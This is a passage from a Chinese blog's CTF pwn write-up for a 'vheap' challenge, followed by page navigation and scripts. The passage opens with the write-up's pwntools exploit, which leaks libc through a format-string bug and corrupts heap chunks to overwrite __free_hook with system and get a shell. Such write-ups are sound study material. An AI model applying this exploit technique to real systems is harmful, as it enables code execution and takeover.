class="hljs-attribute">p</span> = process(&#x27;./vheap&#x27;)<br>    <span class="hljs-attribute">libc</span> = ELF(&#x27;/home/sh0ve1/glibc-<span class="hljs-literal">all</span>-in-one/libs/<span class="hljs-number">2</span>.<span class="hljs-number">27</span>-<span class="hljs-number">3</span>ubuntu1.<span class="hljs-number">5</span>_amd64/libc-<span class="hljs-number">2</span>.<span class="hljs-number">27</span>.so&#x27;)<br><br><span class="hljs-attribute">elf</span> = ELF(&#x27;./vheap&#x27;)<br><br><span class="hljs-comment"># gdb.attach(p,&quot;b *0x555555554000+0x0D1D&quot;) # call _sprintf</span><br><span class="hljs-comment"># 格式化字符串漏洞泄露libc基址</span><br><span class="hljs-attribute">p</span>.sendlineafter(<span class="hljs-string">&quot;first,tell me your name.\n&quot;</span>,&#x27;%<span class="hljs-number">2</span>$p&#x27;)<br><span class="hljs-attribute">p</span>.recvuntil(&#x27;<span class="hljs-number">0</span>x&#x27;)<br><span class="hljs-attribute">libc</span>.address = int(p.recv(<span class="hljs-number">12</span>),<span class="hljs-number">16</span>) - <span class="hljs-number">0</span>x110031<br><span class="hljs-attribute">success</span>(hex(libc.address))<br><br><span class="hljs-attribute">p</span>.sendlineafter(<span class="hljs-string">&quot;How many pieces of data?\n&quot;</span>,&#x27;<span class="hljs-number">2</span>&#x27;)<br><br><span class="hljs-attribute">payload1</span> = b&#x27;/bin/sh\x00&#x27; + p64(<span class="hljs-number">0</span>)*<span class="hljs-number">2</span> + p64(<span class="hljs-number">0</span>x31) + p64(libc.sym[&#x27;__free_hook&#x27;]) + p64(<span class="hljs-number">0</span>x0)*<span class="hljs-number">3</span><br><span class="hljs-attribute">payload2</span> = p64(libc.sym[&#x27;system&#x27;]) + p64(<span class="hljs-number">0</span>)*<span class="hljs-number">7</span><br><span class="hljs-attribute">p</span>.send(payload1)<br><span class="hljs-attribute">p</span>.send(payload2)<br><br><span class="hljs-attribute">p</span>.sendlineafter(<span class="hljs-string">&quot;Size:\n&quot;</span>,&#x27;<span class="hljs-number">8</span>&#x27;) # 跟下面的指令个数一致，最多只能<span class="hljs-number">9</span>个<br><span class="hljs-attribute">p</span>.recvuntil(<span class="hljs-string">&quot;+++]\n&quot;</span>)<br><br><span class="hljs-comment"># gdb.attach(p,&quot;b *0x555555554000+0xEB1&quot;) # EFD 0x108C</span><br><span class="hljs-comment"># gdb.attach(p,&quot;b *0x555555554000+0x109E&quot;) # malloc</span><br><span class="hljs-comment"># gdb.attach(p,&quot;b *0x555555554000+0x123A&quot;) # edit</span><br><span class="hljs-comment"># gdb.attach(p,&quot;b *0x555555554000+0xEAF&quot;) # main tail</span><br><br><span class="hljs-comment"># 发送指令</span><br><span class="hljs-attribute">p</span>.sendline(str(<span class="hljs-number">0</span>x0A011000)) # add <span class="hljs-number">0</span>x10 <span class="hljs-number">0</span><br><span class="hljs-attribute">p</span>.sendline(str(<span class="hljs-number">0</span>x0A012001)) # add <span class="hljs-number">0</span>x20 <span class="hljs-number">1</span><br><span class="hljs-attribute">p</span>.sendline(str(<span class="hljs-number">0</span>x0C011001)) # free <span class="hljs-number">1</span><br><span class="hljs-attribute">p</span>.sendline(str(<span class="hljs-number">0</span>x0B000000)) # edit <span class="hljs-number">0</span> overlapping chunk1&#x27;s fd<br><span class="hljs-attribute">p</span>.sendline(str(<span class="hljs-number">0</span>x0A012001)) # add <span class="hljs-number">0</span>x20 <span class="hljs-number">1</span><br><span class="hljs-attribute">p</span>.sendline(str(<span class="hljs-number">0</span>x0A012001)) # add <span class="hljs-number">0</span>x20 <span class="hljs-number">1</span><br><span class="hljs-attribute">p</span>.sendline(str(<span class="hljs-number">0</span>x0B010001)) # edit <span class="hljs-number">1</span> overlapping<br><span class="hljs-attribute">p</span>.sendline(str(<span class="hljs-number">0</span>x0C011000)) # free <span class="hljs-number">0</span> trigger free_hook<br><br><span class="hljs-comment"># gdb.attach(p)</span><br><span class="hljs-attribute">p</span>.interactive()<br><br></code></pre></td></tr></table></figure>

<h2 id="0x5-Summary"><a href="#0x5-Summary" class="headerlink" title="0x5 Summary"></a>0x5 Summary</h2><p>感觉还是比较简单，利用思路清晰。唯一的困难就是逆向解析出指令的结构及其含义。</p>
<h2 id="0x6-Reference"><a href="#0x6-Reference" class="headerlink" title="0x6 Reference"></a>0x6 Reference</h2><ul>
<li><a target="_blank" rel="noopener" href="https://www.bbsmax.com/A/amd0K3qL5g/">IDA逆向常用宏定义</a></li>
</ul>

            </div>
            <hr>
            <div>
              <div class="post-metas mb-3">
                
                  <div class="post-meta mr-3">
                    <i class="iconfont icon-category"></i>
                    
                      <a class="hover-with-bg" href="/categories/CTF-WriteUp/">CTF-WriteUp</a>
                    
                  </div>
                
                
                  <div class="post-meta">
                    <i class="iconfont icon-tags"></i>
                    
                      <a class="hover-with-bg" href="/tags/heap/">heap</a>
                    
                      <a class="hover-with-bg" href="/tags/fmtstr/">fmtstr</a>
                    
                      <a class="hover-with-bg" href="/tags/%E5%A0%86%E6%BA%A2%E5%87%BA/">堆溢出</a>
                    
                  </div>
                
              </div>
              
                <p class="note note-warning">
                  
                    本博客所有文章除特别声明外，均采用 <a target="_blank" href="https://creativecommons.org/licenses/by-sa/4.0/deed.zh" rel="nofollow noopener noopener">CC BY-SA 4.0 协议</a> ，转载请注明出处！
                  
                </p>
              
              
                <div class="post-prevnext">
                  <article class="post-prev col-6">
                    
                    
                      <a href="/2022/05/16/2022%E6%98%A5%E7%A7%8B%E6%9D%AF%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8%E8%81%94%E8%B5%9B-%E6%98%A5%E5%AD%A3%E8%B5%9BPwn%E9%A2%98/">
                        <i class="iconfont icon-arrowleft"></i>
                        <span class="hidden-mobile">2022春秋杯网络安全联赛-春季赛Pwn题</span>
                        <span class="visible-mobile">上一篇</span>
                      </a>
                    
                  </article>
                  <article class="post-next col-6">
                    
                    
                      <a href="/2022/03/26/VNCTF2022-PWN-WriteUp/">
                        <span class="hidden-mobile">VNCTF2022 PWN WriteUp</span>
                        <span class="visible-mobile">下一篇</span>
                        <i class="iconfont icon-arrowright"></i>
                      </a>
                    
                  </article>
                </div>
              
            </div>

            
              <!-- Comments -->
              <article class="comments" id="comments" lazyload>
                
                  
                
                
  <div id="valine"></div>
  <script type="text/javascript">
    Fluid.utils.loadComments('#valine', function() {
      Fluid.utils.createScript('https://cdn.jsdelivr.net/npm/valine@1/dist/Valine.min.js', function() {
        var options = Object.assign(
          {"appId":"2GYV17CUmss2VIOWS1MFpfqj-gzGzoHsz","appKey":"0R4wcvymx9kXQiyeaw8t2otu","path":"window.location.pathname","placeholder":"说点什么吧","avatar":"retro","meta":["nick","mail","link"],"requiredFields":[],"pageSize":10,"lang":"zh-CN","highlight":false,"recordIP":false,"serverURLs":"","emojiCDN":null,"emojiMaps":null,"enableQQ":false},
          {
            el: "#valine",
            path: window.location.pathname
          }
        )
        new Valine(options);
        Fluid.utils.waitElementVisible('#valine .vcontent', () => {
          Fluid.plugins.initFancyBox('#valine .vcontent img:not(.vemoji)');
        })
      });
    });
  </script>
  <noscript>Please enable JavaScript to view the comments</noscript>


              </article>
            
          </article>
        </div>
      </div>
    </div>
    
      <div class="d-none d-lg-block col-lg-2 toc-container" id="toc-ctn">
        <div id="toc">
  <p class="toc-header"><i class="iconfont icon-list"></i>&nbsp;目录</p>
  <div class="toc-body" id="toc-body"></div>
</div>

      </div>
    
  </div>
</div>

<!-- Custom -->


    

    
      <a id="scroll-top-button" aria-label="TOP" href="#" role="button">
        <i class="iconfont icon-arrowup" aria-hidden="true"></i>
      </a>
    

    
      <div class="modal fade" id="modalSearch" tabindex="-1" role="dialog" aria-labelledby="ModalLabel"
     aria-hidden="true">
  <div class="modal-dialog modal-dialog-scrollable modal-lg" role="document">
    <div class="modal-content">
      <div class="modal-header text-center">
        <h4 class="modal-title w-100 font-weight-bold">搜索</h4>
        <button type="button" id="local-search-close" class="close" data-dismiss="modal" aria-label="Close">
          <span aria-hidden="true">&times;</span>
        </button>
      </div>
      <div class="modal-body mx-3">
        <div class="md-form mb-5">
          <input type="text" id="local-search-input" class="form-control validate">
          <label data-error="x" data-success="v"
                 for="local-search-input">关键词</label>
        </div>
        <div class="list-group" id="local-search-result"></div>
      </div>
    </div>
  </div>
</div>
    

    
  </main>

  <footer class="text-center mt-5 py-3">
  <div class="footer-content">
     <div> <span id="timeDate">载入天数...</span> <span id="times">载入时分秒...</span> <script src="/js/RunData.js"></script> </div> 
  </div>
  
  <div class="statistics">
    
    

    
      
        <!-- LeanCloud 统计PV -->
        <span id="leancloud-site-pv-container" style="display: none">
            总访问量 
            <span id="leancloud-site-pv"></span>
             次
          </span>
      
      
        <!-- LeanCloud 统计UV -->
        <span id="leancloud-site-uv-container" style="display: none">
            总访客数 
            <span id="leancloud-site-uv"></span>
             人
          </span>
      

    
  </div>


  

  
</footer>


  <!-- SCRIPTS -->
  
  <script  src="https://cdn.jsdelivr.net/npm/nprogress@0/nprogress.min.js" ></script>
  <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/nprogress@0/nprogress.min.css" />

  <script>
    NProgress.configure({"showSpinner":false,"trickleSpeed":100})
    NProgress.start()
    window.addEventListener('load', function() {
      NProgress.done();
    })
  </script>


<script  src="https://cdn.jsdelivr.net/npm/jquery@3/dist/jquery.min.js" ></script>
<script  src="https://cdn.jsdelivr.net/npm/bootstrap@4/dist/js/bootstrap.min.js" ></script>
<script  src="/js/events.js" ></script>
<script  src="/js/plugins.js" ></script>

<!-- Plugins -->


  <script  src="/js/local-search.js" ></script>



  
    <script  src="/js/img-lazyload.js" ></script>
  



  



  
    <script  src="https://cdn.jsdelivr.net/npm/tocbot@4/dist/tocbot.min.js" ></script>
  
  
    <script  src="https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@3/dist/jquery.fancybox.min.js" ></script>
  
  
    <script  src="https://cdn.jsdelivr.net/npm/anchor-js@4/anchor.min.js" ></script>
  
  
    <script defer src="https://cdn.jsdelivr.net/npm/clipboard@2/dist/clipboard.min.js" ></script>
  




  <script defer src="/js/leancloud.js" ></script>



  <script  src="https://cdn.jsdelivr.net/npm/typed.js@2/lib/typed.min.js" ></script>
  <script>
    (function (window, document) {
      var typing = Fluid.plugins.typing;
      var title = document.getElementById('subtitle').title;
      
        typing(title);
      
    })(window, document);
  </script>












  

  

  

  

  

  





<!-- 主题的启动项 保持在最底部 -->
<script  src="/js/boot.js" ></script>


</body>
</html>
